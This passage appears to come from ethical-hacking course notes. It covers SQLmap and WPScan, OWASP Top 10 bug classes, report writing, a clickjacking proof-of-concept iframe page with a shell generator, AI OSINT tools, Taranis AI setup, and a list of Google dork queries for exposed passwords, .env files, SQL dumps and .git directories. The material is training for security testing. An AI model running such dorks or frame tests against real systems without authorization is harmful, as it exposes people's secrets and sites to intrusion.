5. SQLmap — SQLMAP is an open-source penetration tool. SQLMAP allows you to automate the
process of identifying and then exploiting SQL injection flaws and subsequently taking control of the
database servers. In addition, SQLMAP comes with a detection engine that includes advanced
features to support penetration testing.

Using Process — https://www.youtube.com/watch?v=nVj8MUKkzQk&list=PL_jb7LxOF7HVvkuovEnszsWayU_-NOtxx

6. WPScan — WPScan is an open-source WordPress security scanner. It is used to scan WordPress websites for known vulnerabilities within the WordPress core and WordPress plugins and themes. It also checks for weak passwords, exposed files, and much more. Since it is a WordPress black-box scanner, it mimics an actual attacker.

Using Process — https://youtu.be/zmK_hg6hIM0?si=jU9GSnO6vl8hnmSN

Step 18 —
Scan Vulnerabilities manually through the testing methods of OWASP Top
10 Vulnerabilities Category.

First of all, let's talk about the categories and subcategories of the OWASP Top 10 vulnerabilities, because once you know what the bugs are, you can exploit them through your own testing methodology.

OWASP Top 10 2021 — Bug Name Examples by Category:

A01: Broken Access Control

• IDOR
• Directory or Path Traversal
• Function Injection
• Privilege Escalation
• Horizontal and Vertical Privilege Escalation

A02: Cryptographic Failures

• Cleartext Transmission of Sensitive Data


• Insufficient Entropy
• Insecure Random Number Generation
• Padding Oracle Attack
• Use of Weak Ciphers
• Weak or Misconfigured Cryptographic Configurations

A03: Injection

• OS Command Injection
• SQL Injection
• Cross-Site Scripting (XSS)
• Expression Language Injection

• XML Injection
• LDAP Injection
• NoSQL Injection
• SSTI

A04: Insecure Design

• Security-by-Obscurity
• Session Fixation
• Unintended Functionality
• Use of Hardcoded Credentials
• Weak Error Handling

A05: Security Misconfiguration

• Default Accounts and Passwords


• Default or Weak Configuration Settings
• Disabled Security Features
• Improperly Configured Permissions and Access Controls (Insecure Permissions)
• Unnecessary Features or Services Enabled
• Use of Vulnerable Software
• Directory Listing Enabled
• Insecure Default Passwords or Credentials
• Improperly Configured Cross-Origin Resource Sharing (CORS)

A06: Vulnerable and Outdated Components

• Use of Known Vulnerable Components


• Outdated Libraries and Frameworks
• Third-Party Components with Unpatched Vulnerabilities
• Lack of Patching and Updates

A07: Identification and Authentication Failures

• Brute-Force Attacks
• Credential Stuffing
• Credential Theft
• Session Hijacking
• Weak Password Policies
• Weak Session Cookies
• Lack of Multi-Factor Authentication (MFA)
• Insecure Session Management
• Insecure Authentication Protocols
• Insecure Password Storage
• User Enumeration

A08: Software and Data Integrity Failures

• Insecure Deserialization
• Tampering with Updates (unsigned or unverified update channels)
• Use of Untrusted Plugins, Libraries, or CI/CD Components
• Unvalidated Redirects and Forwards

A09: Security Logging and Monitoring Failures

• Lack of Audit Logging


• Insufficient Log Data
• Unmonitored Logs
• Unsecured Logs

A10: Server-Side Request Forgery (SSRF)

• Unauthenticated SSRF
• Authenticated SSRF

Now you can test your target website with a variety of techniques to find these vulnerabilities. I recommend following write-ups related to each vulnerability class.

Step 19—
Analyze Vulnerability Databases.

Recommending some resources —

1. Exploit Database — https://www.exploit-db.com/

2. Vulnerability Database — https://vuldb.com/

3. CVE Security Vulnerabilities — https://www.cvedetails.com/

4. Patchstack — https://patchstack.com/database/

Step 20—
Report Writing

Report Structure:
A security testing report should have a clear and logical structure. Here’s a recommended structure:

a. Introduction: Provide a brief overview of the security testing context, objectives, and report
scope.

b. Methodology: Describe the techniques and tools used to conduct the security testing.

c. Findings: Present the identified vulnerabilities in a clear and organized manner. Use categories
or severity levels to aid readability.

d. Evidence: Include screenshots, code snippets, or any other evidence to support your findings.

e. Recommendations: Propose specific corrective measures for each identified vulnerability.

f. Conclusion: Summarize the key points of the report and express gratitude to relevant parties.
I also recommend following this guide — https://www.intigriti.com/hackademy/how-to-write-a-good-report

39. EHP Bug Hunting with Manual Testing

Bug Hunting with Manual Testing

Bug Hunting Manual

https://medium.com/@zisansakibhaque/web-application-security-testing-method-5ed53ab7f168

Step-10

Clickjacking

HTTP Security Response Headers Cheat Sheet

HTTP Headers are a great booster for web security with easy implementation. Proper HTTP response
headers can help prevent security vulnerabilities like Cross-Site Scripting, Clickjacking, Information
disclosure and more.

http header/ security header owasp (blog)

https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html

For testing purposes, find programs on the bug bounty platforms listed below.

Bug bounty platforms

1. HackerOne
https://hackerone.com/bug-bounty-programs

2. Bugcrowd
https://bugcrowd.com/engagements?category=bug_bounty&page=1&sort_by=promoted&sort_direction=desc

Public Bug Bounty Program List
https://www.bugcrowd.com/bug-bounty-list/

3. Bugbase
https://bugbase.ai/programs

4. Intigriti
https://www.intigriti.com/researchers/bug-bounty-programs

5. EC-Council Bug Bounty Program
https://www.eccouncil.org/bug-bounty/

To check security header info we can use some of these websites:

1. https://securityheaders.com/
2. https://developer.mozilla.org/en-US/observatory
3. https://www.serpworx.com/check-security-headers/
4. https://domsignal.com/secure-header-test

The main focus of a bug bounty report is to demonstrate the vulnerability's impact.

Manual test for clickjacking

Clickjacking PoC script

<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<iframe src="https://example.com" width="500" height="500"></iframe>
</body>
</html>
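A small script can generate that PoC for any target (the default URL is a placeholder; pass the page you are testing as the first argument):

```shell
#!/bin/sh
# Generate a clickjacking proof-of-concept page for a given URL
target="${1:-https://example.com}"
poc_file="$(mktemp -d)/clickjack-poc.html"

cat > "$poc_file" <<EOF
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>If the target page renders inside this frame, it is frameable.</p>
<iframe src="$target" width="500" height="500"></iframe>
</body>
</html>
EOF

echo "PoC written to $poc_file"
```

Open the generated file in a browser: if the target renders inside the iframe, it lacks X-Frame-Options / frame-ancestors protection.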

Note: creating a clickjacking script with AI will be covered in an upcoming class.

Never submit a raw automated scan report; validate findings manually first.

1. False Positive

Definition: A vulnerability is incorrectly flagged as present, but it does not actually exist.

Example: An automated security tool mistakenly identifies a harmless code snippet as a SQL
Injection vulnerability.

Implications: Leads to wasted time investigating non-existent issues, which can slow down the
vulnerability assessment process.

Key Takeaway: Ensure thorough manual validation to avoid acting on false alarms.

2. True Positive

Definition: A vulnerability is correctly identified as present.

Types:

• Automatically Corrected: The system detects and resolves the issue without human
intervention.

• Manually Corrected: The system flags the issue, and a security analyst confirms and remediates
it.

Example: A scanner identifies and patches a known outdated dependency (automatic) or flags an
XSS vulnerability that a developer confirms and fixes (manual).

Implications: Shows the system is effective in detecting actual vulnerabilities, but manual review
may still be required for thoroughness.

Key Takeaway: Balance between automation and manual validation improves overall accuracy and
resolution.

3. False Negative

Definition: A vulnerability is present but is not detected by the system.

Example: An automated tool fails to identify an insecure API endpoint vulnerable to unauthorized
access.

Implications: These are the most dangerous as they provide a false sense of security, leaving
systems exposed.

Key Takeaway: Regularly update tools and perform manual penetration testing to uncover missed
vulnerabilities.

4. True Negative

Definition: No vulnerability is present, and the system correctly identifies that no issue exists.

Example: A secure web application undergoes scanning, and the tool accurately reports no
vulnerabilities.

Implications: Confirms the accuracy of the tool, minimizing unnecessary alerts and providing
confidence in the system's security.

Key Takeaway: Strive for a high true negative rate to reduce false alarms and improve operational
efficiency.
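These four outcomes are exactly a confusion matrix, so a scanner's accuracy can be summarized with precision and recall. A quick sketch with made-up counts:

```shell
#!/bin/sh
# Hypothetical scan results: 40 TP, 10 FP, 5 FN, 945 TN (illustration only)
result=$(awk 'BEGIN {
    tp = 40; fp = 10; fn = 5; tn = 945
    precision = tp / (tp + fp)   # share of flagged findings that are real
    recall    = tp / (tp + fn)   # share of real issues that were caught
    printf "precision=%.2f recall=%.2f", precision, recall
}')
echo "$result"
```

High recall matters most here: every missed vulnerability (false negative) is risk that stays in production.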

40. EHP Do’s and Don’ts in Bug Report writing

Do’s and Don’ts in Bug Report Writing

41. EHP Ethical Hacking with AI – Part 01

Ethical Hacking with AI – Part 01

1. PentestGPT ( https://pentestgpt.ai/ ) ( https://github.com/GreyDGL/PentestGPT )
2. PayloadsAllTheThings ( https://github.com/swisskyrepo/PayloadsAllTheThings )
3. PentestGPT Plugin

42. EHP Ethical Hacking with AI – Part 02

Ethical Hacking with AI – Part 02

Cylect (AI OSINT Tool)


https://cylect.io/

Cylect is an advanced OSINT (Open-Source Intelligence) tool that leverages AI to streamline the
process of gathering publicly available information. Its primary purpose is to assist cybersecurity
professionals, investigators, and researchers in acquiring actionable intelligence from diverse
sources. Below are some key features and functionalities you might expect from a tool like Cylect:

Key Features:

Automated Data Collection:

• Extracts information from websites, social media platforms, and public databases.
• Scrapes data from various forums, blogs, and news outlets.

AI-Powered Analysis:

• Uses machine learning to identify patterns, trends, and anomalies in collected data.
• Offers sentiment analysis for social media content and articles.

Multi-Layered Search:

• Supports deep web and dark web exploration using anonymizing networks like Tor.
• Advanced search capabilities to refine and filter data effectively.

Data Visualization:

• Presents information in charts, graphs, and networks for better understanding.


• Generates heatmaps to locate geographical data trends.

Integration and Extensibility:

• Compatible with third-party APIs (e.g., Shodan, VirusTotal).


• Customizable modules to suit specific OSINT requirements.

Real-Time Monitoring:

• Tracks specific keywords or entities across multiple platforms.


• Sends alerts for new findings or critical changes.

Compliance and Privacy:

• Includes features to ensure ethical usage and compliance with legal standards.

Report Generation:

• Provides detailed and shareable reports in various formats (PDF, JSON, etc.).
• Includes actionable insights for decision-making.

Applications:

Cybersecurity: Identifying vulnerabilities and potential threats.

Investigations: Gathering evidence for legal or personal cases.

Brand Protection: Monitoring reputation and intellectual property violations.

Threat Intelligence: Tracking malicious activities and actors.

Some other similar tools

1. Maltego: A comprehensive link analysis tool that can be enhanced with AI modules for advanced
entity analysis.

Website: https://www.maltego.com

2. Social-Searcher: Incorporates basic AI for sentiment and trend analysis on social media.

Website: https://www.social-searcher.com

3. Twint: An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API,
allowing you to scrape a user's followers, following, Tweets and more while evading most API
limitations.

Website: https://github.com/twintproject/twint

4. Amass: In-depth attack surface mapping and asset discovery.

Website: https://github.com/owasp-amass/amass

5. FOCA: Tool to find metadata and hidden information in the documents.

Website: https://github.com/ElevenPaths/FOCA

Traditional OSINT Tools (Non-AI or Minimal AI Features):

theHarvester

Primarily relies on rule-based techniques to collect data.

Recon-ng

Modular but not inherently AI-driven.

SpiderFoot

Focuses on automating OSINT tasks without much AI involvement.

Shodan

Offers basic data aggregation but doesn’t heavily rely on AI.

Censys

Provides search functionality without AI-driven analysis.

43. EHP Ethical Hacking with AI – Part 03

Ethical Hacking with AI – Part 03


DorkGPT (see class 21)

DorkGPT

Site: https://www.dorkgpt.com/

Google Dorking (or Google hacking) is a method of using advanced search operators in Google to
uncover sensitive information, vulnerabilities, or flaws in websites and web applications. These
operators can help find misconfigurations, exposed databases, administrative panels, and other
sensitive data that shouldn't be publicly accessible.

Here are some examples of Google Dorks that can be used to discover potential vulnerabilities in
web applications. Remember, using these techniques for illegal purposes is unethical and often
illegal, so ensure your actions are ethical and within legal boundaries (e.g., authorized penetration
testing or vulnerability scanning).

Examples

# 1. Find exposed login pages:


inurl:"login" intitle:"login"

# 2. Discover exposed administrative panels:


inurl:"admin" intitle:"admin"

# 3. Search for exposed configuration files:


inurl:"config" filetype:txt

# 4. Search for publicly exposed databases (MySQL, MongoDB, etc.):


filetype:sql "password"
filetype:sql "database"

# 5. Find exposed .git directories (Git repositories):


intitle:"index of" .git

# 6. Find unsecured or publicly exposed backup files:


filetype:bak "password"

# 7. Search for publicly exposed PHP error messages (may contain vulnerabilities):
inurl:"error_log" filetype:log

# 8. Find exposed sensitive files (like usernames and passwords in text files):
filetype:txt "username" "password"

# 9. Look for open directories (could contain sensitive files):


intitle:"index of" "admin"

# 10. Discover publicly exposed WordPress admin panels:


inurl:"wp-login.php"

# 11. Look for unsecured login forms with POST methods:


inurl:"login" method="post"

# 12. Find publicly exposed .env configuration files (often used for environment variables):
filetype:env

# 13. Find exposed login or authentication forms for WordPress:


inurl:"wp-login.php"

# 14. Search for public PDFs containing sensitive information:


filetype:pdf "password"

# 15. Look for error pages that may provide server details or vulnerabilities:
inurl:"404" intitle:"Not Found"

Extra Links:

Generate Dork: https://www.yeschat.ai/gpts-9t557DT1RUP-GrokGPT

https://www.yeschat.ai/ (directory of GPTs, free to try without ChatGPT Plus)

44. EHP Ethical Hacking with AI – Part 04

Ethical Hacking with AI – Part 04


TARANIS_AI (OSINT Tool)

Taranis AI is an advanced Open-Source Intelligence (OSINT) tool, leveraging Artificial Intelligence to revolutionize information gathering and situational analysis.

Link: https://taranis.ai/

Note: Docker must be installed to run Taranis AI.

To install Docker on Kali:

https://www.kali.org/docs/containers/installing-docker-on-kali/

>> sudo apt update

>> sudo apt install -y docker.io

>> sudo systemctl enable docker --now

>> docker

Manual Installation of the Docker Compose Plugin: If docker compose is still unavailable after the steps above, install the plugin manually:

>> DOCKER_CONFIG=${DOCKER_CONFIG:-$HOME/.docker}
>> mkdir -p $DOCKER_CONFIG/cli-plugins
>> curl -SL https://github.com/docker/compose/releases/download/v2.12.2/docker-compose-linux-x86_64 -o $DOCKER_CONFIG/cli-plugins/docker-compose

Set Executable Permissions: Apply executable permissions to the binary:


>> chmod +x $DOCKER_CONFIG/cli-plugins/docker-compose

Verify Installation: Check the version of Docker Compose to verify the installation:
>> docker compose version

Now Install TARANIS_AI

https://taranis.ai/docs/getting-started/deployment/

Deployment
How to deploy Taranis AI
Clone via git

>> git clone --depth 1 https://github.com/taranis-ai/taranis-ai


>> cd taranis-ai/docker/

Configuration
Copy env.sample to .env

>> cp env.sample .env

Startup & Usage


Start-up application

>> docker compose up -d

Use the application


http://<url>:<TARANIS_PORT>/login

45. EHP Ethical Hacking with AI – Part 05

Ethical Hacking with AI – Part 05
